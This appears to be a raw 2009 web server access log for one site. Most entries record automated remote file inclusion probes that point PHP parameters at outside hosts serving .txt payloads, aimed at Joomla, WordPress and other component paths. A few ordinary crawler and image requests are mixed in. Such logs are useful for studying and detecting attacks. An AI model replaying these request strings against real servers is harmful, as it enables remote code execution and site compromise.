74.205.54.26 - - [30/Oct/2009:10:12:06 -0700] "GET /logs/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.205.54.26 - - [30/Oct/2009:10:12:08 -0700] "GET /logs/access_080928.log/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.205.54.26 - - [30/Oct/2009:10:12:08 -0700] "GET /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.205.54.26 - - [30/Oct/2009:10:12:09 -0700] "GET /logs/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.205.54.26 - - [30/Oct/2009:10:12:09 -0700] "GET /logs/access_080928.log/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.205.54.26 - - [30/Oct/2009:10:12:09 -0700] "GET /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.205.54.26 - - [30/Oct/2009:10:12:09 -0700] "GET /logs/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.205.54.26 - - [30/Oct/2009:10:12:09 -0700] "GET /logs/access_080928.log/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.205.54.26 - - [30/Oct/2009:10:12:09 -0700] "GET /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.205.54.26 - - [30/Oct/2009:10:12:09 -0700] "GET /logs/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.205.54.26 - - [30/Oct/2009:10:12:10 -0700] "GET /logs/access_080928.log/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.205.54.26 - - [30/Oct/2009:10:12:10 -0700] "GET /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.205.54.26 - - [30/Oct/2009:10:12:10 -0700] "GET /logs/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
112.78.14.2 - - [30/Oct/2009:10:12:14 -0700] "GET /wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://119.69.199.43/bbs//idfx1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
112.78.14.2 - - [30/Oct/2009:10:12:14 -0700] "GET /logs/access_090601.log//wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://119.69.199.43/bbs//idfx1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
112.78.14.2 - - [30/Oct/2009:10:12:14 -0700] "GET /logs//wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://119.69.199.43/bbs//idfx1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
87.104.34.140 - - [30/Oct/2009:10:12:17 -0700] "GET /s_loadenv.inc.php?DOCUMENT_ROOT=http://www.shchd.co.kr/icon/zfxid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
87.104.34.140 - - [30/Oct/2009:10:12:17 -0700] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.shchd.co.kr/icon/zfxid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
87.104.34.140 - - [30/Oct/2009:10:12:17 -0700] "GET /logs/access_080531.log//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.shchd.co.kr/icon/zfxid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
86.65.110.157 - - [30/Oct/2009:10:12:23 -0700] "GET /logs/index.php?pagina=http://www.shchd.co.kr/icon/zfxid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
86.65.110.157 - - [30/Oct/2009:10:12:25 -0700] "GET /logs/access_080818.log%20%20/index.php?pagina=http://www.shchd.co.kr/icon/zfxid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
86.65.110.157 - - [30/Oct/2009:10:12:26 -0700] "GET /index.php?pagina=http://www.shchd.co.kr/icon/zfxid1.txt?? HTTP/1.1" 200 15917 "-" "Mozilla/5.0" "www.dmulk.com"
64.157.4.41 - - [30/Oct/2009:10:12:26 -0700] "POST /blog/wp-cron.php?doing_wp_cron HTTP/1.0" 200 1 "-" "WordPress/2.8.5; http://dmulk.com/blog" "dmulk.com"
94.236.23.242 - - [30/Oct/2009:10:12:32 -0700] "GET /logs////?_SERVER[DOCUMENT_ROOT]=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 200 123790 "-" "Mozilla/5.0" "www.dmulk.com"
94.236.23.242 - - [30/Oct/2009:10:12:32 -0700] "GET /logs/access_080603.log%20%20////?_SERVER[DOCUMENT_ROOT]=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
94.236.23.242 - - [30/Oct/2009:10:12:33 -0700] "GET ///?_SERVER[DOCUMENT_ROOT]=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 200 16075 "-" "Mozilla/5.0" "www.dmulk.com"
94.236.23.242 - - [30/Oct/2009:10:12:34 -0700] "GET /logs/access_080603.log%20%20////?_SERVER[DOCUMENT_ROOT]=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
94.236.23.242 - - [30/Oct/2009:10:12:34 -0700] "GET ///?_SERVER[DOCUMENT_ROOT]=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 200 16075 "-" "Mozilla/5.0" "www.dmulk.com"
94.236.23.242 - - [30/Oct/2009:10:12:34 -0700] "GET /logs/access_080308.log%20%20////?_SERVER[DOCUMENT_ROOT]=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
94.236.23.242 - - [30/Oct/2009:10:12:34 -0700] "GET /logs////?_SERVER[DOCUMENT_ROOT]=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 200 123790 "-" "Mozilla/5.0" "www.dmulk.com"
94.236.23.242 - - [30/Oct/2009:10:12:35 -0700] "GET /logs/access_080603.log%20%20////?_SERVER[DOCUMENT_ROOT]=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
94.236.23.242 - - [30/Oct/2009:10:12:35 -0700] "GET ///?_SERVER[DOCUMENT_ROOT]=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 200 16075 "-" "Mozilla/5.0" "www.dmulk.com"
94.236.23.242 - - [30/Oct/2009:10:12:35 -0700] "GET /logs////?_SERVER[DOCUMENT_ROOT]=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 200 123790 "-" "Mozilla/5.0" "www.dmulk.com"
94.236.23.242 - - [30/Oct/2009:10:12:35 -0700] "GET /logs/access_080308.log%20%20////?_SERVER[DOCUMENT_ROOT]=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
94.236.23.242 - - [30/Oct/2009:10:12:36 -0700] "GET /logs/access_080308.log%20%20////?_SERVER[DOCUMENT_ROOT]=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
87.104.34.140 - - [30/Oct/2009:10:13:02 -0700] "GET /s_loadenv.inc.php?DOCUMENT_ROOT=http://www.shchd.co.kr/icon/zfxid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
87.104.34.140 - - [30/Oct/2009:10:13:02 -0700] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.shchd.co.kr/icon/zfxid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
87.104.34.140 - - [30/Oct/2009:10:13:03 -0700] "GET /logs/access_080531.log//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.shchd.co.kr/icon/zfxid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
121.101.214.54 - - [30/Oct/2009:10:13:08 -0700] "GET /logs////?_SERVER[DOCUMENT_ROOT]=5&dir=http://www.simplyski.com//id1.txt???? HTTP/1.1" 200 123790 "-" "Mozilla/5.0" "www.dmulk.com"
121.101.214.54 - - [30/Oct/2009:10:13:10 -0700] "GET ///?_SERVER[DOCUMENT_ROOT]=5&dir=http://www.simplyski.com//id1.txt???? HTTP/1.1" 200 16072 "-" "Mozilla/5.0" "www.dmulk.com"
74.205.54.26 - - [30/Oct/2009:10:13:10 -0700] "GET /logs/access_080218.log/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.205.54.26 - - [30/Oct/2009:10:13:10 -0700] "GET /logs/access_080218.log/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.205.54.26 - - [30/Oct/2009:10:13:10 -0700] "GET /logs/access_080218.log/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.205.54.26 - - [30/Oct/2009:10:13:10 -0700] "GET /logs/access_080218.log/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.205.54.26 - - [30/Oct/2009:10:13:10 -0700] "GET /logs/access_080218.log/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.205.54.26 - - [30/Oct/2009:10:13:10 -0700] "GET /logs/access_080218.log/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.205.54.26 - - [30/Oct/2009:10:13:10 -0700] "GET /logs/access_080218.log/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
121.101.214.54 - - [30/Oct/2009:10:13:25 -0700] "GET /logs/access_080308.log////?_SERVER[DOCUMENT_ROOT]=5&dir=http://www.simplyski.com//id1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
121.101.214.54 - - [30/Oct/2009:10:13:28 -0700] "GET /logs/access_080603.log////?_SERVER[DOCUMENT_ROOT]=5&dir=http://www.simplyski.com//id1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
196.40.58.10 - - [30/Oct/2009:10:13:41 -0700] "GET /modules/xfsection/modify.php?dir_module=http://www.divasvip.com.mx/fx29id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
121.101.214.54 - - [30/Oct/2009:10:13:42 -0700] "GET /logs/access_080603.log%20%20////?_SERVER[DOCUMENT_ROOT]=5&dir=http://www.simplyski.com//id1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
196.40.58.10 - - [30/Oct/2009:10:13:42 -0700] "GET /logs//modules/xfsection/modify.php?dir_module=http://www.divasvip.com.mx/fx29id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
121.101.214.54 - - [30/Oct/2009:10:13:42 -0700] "GET ///?_SERVER[DOCUMENT_ROOT]=5&dir=http://www.simplyski.com//id1.txt???? HTTP/1.1" 200 16071 "-" "Mozilla/5.0" "www.dmulk.com"
196.40.58.10 - - [30/Oct/2009:10:13:42 -0700] "GET /logs/access_080513.log//modules/xfsection/modify.php?dir_module=http://www.divasvip.com.mx/fx29id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
121.101.214.54 - - [30/Oct/2009:10:13:42 -0700] "GET /logs////?_SERVER[DOCUMENT_ROOT]=5&dir=http://www.simplyski.com//id1.txt???? HTTP/1.1" 200 123790 "-" "Mozilla/5.0" "www.dmulk.com"
206.225.23.4 - - [30/Oct/2009:10:13:48 -0700] "GET /logs/access_071028.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.melawai.com//images/id1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
206.225.23.4 - - [30/Oct/2009:10:13:48 -0700] "GET /logs/access_071016.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.melawai.com//images/id1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
206.225.23.4 - - [30/Oct/2009:10:13:49 -0700] "GET /logs/access_071016.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.melawai.com//images/id1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
206.225.23.4 - - [30/Oct/2009:10:13:49 -0700] "GET /logs/access_071028.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.melawai.com//images/id1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
196.40.58.10 - - [30/Oct/2009:10:13:52 -0700] "GET /logs/access_080319.log//modules/xfsection/modify.php?dir_module=http://www.divasvip.com.mx/fx29id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
67.214.182.243 - - [30/Oct/2009:10:13:57 -0700] "GET /logs/access_090218.log HTTP/1.1" 200 8060928 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "www.dmulk.com"
121.101.214.54 - - [30/Oct/2009:10:14:01 -0700] "GET /logs/access_080308.log%20%20////?_SERVER[DOCUMENT_ROOT]=5&dir=http://www.simplyski.com//id1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
121.101.214.54 - - [30/Oct/2009:10:14:22 -0700] "GET /logs/access_080308.log////?_SERVER[DOCUMENT_ROOT]=5&dir=http://www.simplyski.com//id1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
121.101.214.54 - - [30/Oct/2009:10:14:22 -0700] "GET /logs/access_080603.log////?_SERVER[DOCUMENT_ROOT]=5&dir=http://www.simplyski.com//id1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
86.65.110.157 - - [30/Oct/2009:10:14:22 -0700] "GET /logs/access_080131.log%20%20/index.php?pagina=http://www.shchd.co.kr/icon/zfxid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
121.101.214.54 - - [30/Oct/2009:10:14:22 -0700] "GET ///?_SERVER[DOCUMENT_ROOT]=5&dir=http://www.simplyski.com//id1.txt???? HTTP/1.1" 200 16071 "-" "Mozilla/5.0" "www.dmulk.com"
121.101.214.54 - - [30/Oct/2009:10:14:23 -0700] "GET /logs////?_SERVER[DOCUMENT_ROOT]=5&dir=http://www.simplyski.com//id1.txt???? HTTP/1.1" 200 123790 "-" "Mozilla/5.0" "www.dmulk.com"
112.78.14.2 - - [30/Oct/2009:10:14:52 -0700] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://119.69.199.43/bbs//idfx1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
112.78.14.2 - - [30/Oct/2009:10:14:52 -0700] "GET /logs/scriptsold.log//tools/send_reminders.php?noSet=0&includedir=http://119.69.199.43/bbs//idfx1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
112.78.14.2 - - [30/Oct/2009:10:14:55 -0700] "GET /tools/send_reminders.php?noSet=0&includedir=http://119.69.199.43/bbs//idfx1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
67.214.182.243 - - [30/Oct/2009:10:14:57 -0700] "GET /logs/access_090218.log HTTP/1.1" 200 10354688 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "www.dmulk.com"
206.225.23.4 - - [30/Oct/2009:10:15:03 -0700] "GET /logs/access_080313.log//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www.melawai.com//images/id1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
67.195.115.254 - - [30/Oct/2009:10:15:11 -0700] "GET /bikes/dteel/2008_02_16/?D=A HTTP/1.0" 200 1680 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
82.193.15.3 - - [30/Oct/2009:10:15:15 -0700] "GET /logs/access_080903.log//atom.php5?page=http://photoworld.com.ua////zfxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
67.214.182.243 - - [30/Oct/2009:10:15:57 -0700] "GET /logs/access_090218.log HTTP/1.1" 200 11010048 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "www.dmulk.com"
209.126.189.35 - - [30/Oct/2009:10:16:10 -0700] "GET /logs/access_080123.log%20%20//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.caindeaf.or.kr/bbs/data/zfxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
209.126.189.35 - - [30/Oct/2009:10:16:10 -0700] "GET /logs//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.caindeaf.or.kr/bbs/data/zfxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
72.11.145.8 - - [30/Oct/2009:10:16:10 -0700] "GET /logs/access_080106.log/????/modifyform.html?code=http://ea3.fileave.com/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "dmulk.com"
72.11.145.8 - - [30/Oct/2009:10:16:11 -0700] "GET /logs/????/modifyform.html?code=http://ea3.fileave.com/id1.txt? HTTP/1.1" 200 123783 "-" "Mozilla/5.0" "dmulk.com"
72.11.145.8 - - [30/Oct/2009:10:16:11 -0700] "GET /????/modifyform.html?code=http://ea3.fileave.com/id1.txt? HTTP/1.1" 200 16042 "-" "Mozilla/5.0" "dmulk.com"
209.126.189.35 - - [30/Oct/2009:10:16:11 -0700] "GET /index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.caindeaf.or.kr/bbs/data/zfxid1.txt? HTTP/1.1" 200 15979 "-" "Mozilla/5.0" "www.dmulk.com"
209.126.189.35 - - [30/Oct/2009:10:16:12 -0700] "GET /logs/access_080123.log%20%20//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.caindeaf.or.kr/bbs/data/zfxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
209.126.189.35 - - [30/Oct/2009:10:16:12 -0700] "GET /logs//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.caindeaf.or.kr/bbs/data/zfxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
209.126.189.35 - - [30/Oct/2009:10:16:13 -0700] "GET /index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.caindeaf.or.kr/bbs/data/zfxid1.txt? HTTP/1.1" 200 15979 "-" "Mozilla/5.0" "www.dmulk.com"
209.126.189.35 - - [30/Oct/2009:10:16:24 -0700] "GET /logs/access_080314.log%20%20//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.caindeaf.or.kr/bbs/data/zfxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
72.11.145.8 - - [30/Oct/2009:10:16:42 -0700] "GET /logs/access_071226.log/????/modifyform.html?code=http://ea3.fileave.com/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
72.11.145.8 - - [30/Oct/2009:10:16:46 -0700] "GET /logs/????/modifyform.html?code=http://ea3.fileave.com/id1.txt? HTTP/1.1" 200 123783 "-" "Mozilla/5.0" "www.dmulk.com"
64.157.4.41 - - [30/Oct/2009:10:16:49 -0700] "POST /blog/wp-cron.php?doing_wp_cron HTTP/1.0" 200 1 "-" "WordPress/2.8.5; http://dmulk.com/blog" "dmulk.com"
72.11.145.8 - - [30/Oct/2009:10:16:50 -0700] "GET /????/modifyform.html?code=http://ea3.fileave.com/id1.txt? HTTP/1.1" 200 16042 "-" "Mozilla/5.0" "www.dmulk.com"
209.126.189.35 - - [30/Oct/2009:10:16:54 -0700] "GET /logs/access_080314.log%20%20//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.caindeaf.or.kr/bbs/data/zfxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
67.214.182.243 - - [30/Oct/2009:10:16:57 -0700] "GET /logs/access_090218.log HTTP/1.1" 200 11591179 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "www.dmulk.com"
206.225.23.4 - - [30/Oct/2009:10:16:59 -0700] "GET /logs/access_080313.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.melawai.com//images/id1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
67.214.182.243 - - [30/Oct/2009:10:18:01 -0700] "GET /logs/access_090218.log HTTP/1.1" 200 8978432 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "www.dmulk.com"
61.50.138.115 - - [30/Oct/2009:10:18:27 -0700] "GET /logs/access_080531.log//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.shchd.co.kr/icon/zfxid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
61.50.138.115 - - [30/Oct/2009:10:18:27 -0700] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.shchd.co.kr/icon/zfxid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
61.50.138.115 - - [30/Oct/2009:10:18:27 -0700] "GET /s_loadenv.inc.php?DOCUMENT_ROOT=http://www.shchd.co.kr/icon/zfxid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
67.195.115.254 - - [30/Oct/2009:10:18:29 -0700] "GET /bikes/dteel/Temp/?D=A HTTP/1.0" 200 823 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
196.40.58.10 - - [30/Oct/2009:10:18:52 -0700] "GET /logs/access_080513.log%20%20//modules/xfsection/modify.php?dir_module=http://www.divasvip.com.mx/fx29id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
196.40.58.10 - - [30/Oct/2009:10:18:53 -0700] "GET /logs/access_080319.log%20%20//modules/xfsection/modify.php?dir_module=http://www.divasvip.com.mx/fx29id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
112.78.14.2 - - [30/Oct/2009:10:18:58 -0700] "GET /logs/access_090601.log%20%20//wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://119.69.199.43/bbs//idfx1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
67.214.182.243 - - [30/Oct/2009:10:19:01 -0700] "GET /logs/access_090218.log HTTP/1.1" 200 10092544 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "www.dmulk.com"
112.78.14.2 - - [30/Oct/2009:10:19:08 -0700] "GET /logs/access_081017.log%20%20//wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://119.69.199.43/bbs//idfx1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
76.1.74.160 - - [30/Oct/2009:10:19:08 -0700] "GET /bikes/2k6klr650/klr005.JPG HTTP/1.1" 200 98538 "http://www.st-owners.com/forums/showthread.php?t=72916" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.15) Gecko/2009101601 Firefox/3.0.15 (.NET CLR 3.5.30729)" "www.dmulk.com"
76.1.74.160 - - [30/Oct/2009:10:19:08 -0700] "GET /bikes/2k6klr650/klr006.JPG HTTP/1.1" 200 109371 "http://www.st-owners.com/forums/showthread.php?t=72916" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.15) Gecko/2009101601 Firefox/3.0.15 (.NET CLR 3.5.30729)" "www.dmulk.com"
76.1.74.160 - - [30/Oct/2009:10:19:09 -0700] "GET /bikes/2k6klr650/klr004.JPG HTTP/1.1" 200 216057 "http://www.st-owners.com/forums/showthread.php?t=72916" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.15) Gecko/2009101601 Firefox/3.0.15 (.NET CLR 3.5.30729)" "www.dmulk.com"
76.1.74.160 - - [30/Oct/2009:10:19:09 -0700] "GET /bikes/2k6klr650/klr003.JPG HTTP/1.1" 200 299517 "http://www.st-owners.com/forums/showthread.php?t=72916" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.15) Gecko/2009101601 Firefox/3.0.15 (.NET CLR 3.5.30729)" "www.dmulk.com"
76.1.74.160 - - [30/Oct/2009:10:19:09 -0700] "GET /bikes/2k6klr650/klr002.JPG HTTP/1.1" 200 287373 "http://www.st-owners.com/forums/showthread.php?t=72916" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.15) Gecko/2009101601 Firefox/3.0.15 (.NET CLR 3.5.30729)" "www.dmulk.com"
76.1.74.160 - - [30/Oct/2009:10:19:09 -0700] "GET /bikes/2k6klr650/klr001a.JPG HTTP/1.1" 200 325181 "http://www.st-owners.com/forums/showthread.php?t=72916" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.15) Gecko/2009101601 Firefox/3.0.15 (.NET CLR 3.5.30729)" "www.dmulk.com"
79.148.238.69 - - [30/Oct/2009:10:19:10 -0700] "GET /logs/administrator/index3.php?mosConfig_absolute_path=http://ujcar.deva.rdsnet.ro/language/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
79.148.238.69 - - [30/Oct/2009:10:19:10 -0700] "GET /administrator/index3.php?mosConfig_absolute_path=http://ujcar.deva.rdsnet.ro/language/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
79.148.238.69 - - [30/Oct/2009:10:19:10 -0700] "GET /logs/access_080226.log/administrator/index3.php?mosConfig_absolute_path=http://ujcar.deva.rdsnet.ro/language/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
